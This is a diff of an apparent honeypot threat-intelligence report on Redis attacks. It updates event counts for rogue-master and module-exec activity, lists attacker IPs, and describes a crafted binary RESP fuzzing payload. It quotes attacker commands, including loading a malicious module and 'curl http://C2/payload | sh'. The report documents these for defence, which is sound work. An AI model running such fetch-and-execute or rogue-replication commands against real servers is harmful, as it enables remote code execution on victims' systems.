TLP:CLEAR

 MODULE LOAD /path/to/malicious.so # Load the module (514 events)

-SYSTEM.EXEC 'curl http://C2/payload | sh' # Execute arbitrary commands (1,214 events)
+SYSTEM.EXEC 'curl http://C2/payload | sh' # Execute arbitrary commands (1,423 events fleet-wide)

 SLAVEOF NO ONE # Break replication

-Top Rogue-Master / Module-Exec Operators
+Top Rogue-Master / module-exec operators

 IPSLAVEOFMODULECONFIGINFONotes

-8.218.74.1627725144,124Most active — full exploitation suite
+8.218.74.1627725144,124258Most active — full exploitation suite

-87.249.134.4117608368,575Heavy INFO scanning + full exploit suite
+87.249.134.41326798810,002Heavy INFO scanning + full exploit suite

 A distinct cluster of IPs (17 total) sends crafted binary RESP frames that do not conform to the Redis protocol specification.
 The payload \x03*%\xe0COOKIE: combines an invalid RESP type byte (\x03), a MULTI/EXEC marker (*), a crafted length field (%\xe0), and a plaintext COOKIE: string.
 This is not standard Redis protocol — it appears to be a targeted fuzzing attempt or an exploit for a specific Redis parser vulnerability.
+(A handful of other IPs send similar-looking but byte-distinct fuzzing payloads that also contain the string COOKIE: — those are a separate, smaller cluster and are not counted here.)

-# Binary protocol attack (11,119 events from 17 IPs)
+# Binary protocol attack (11,674 events from 17 IPs)

 \x03 * % \xe0 COOKIE: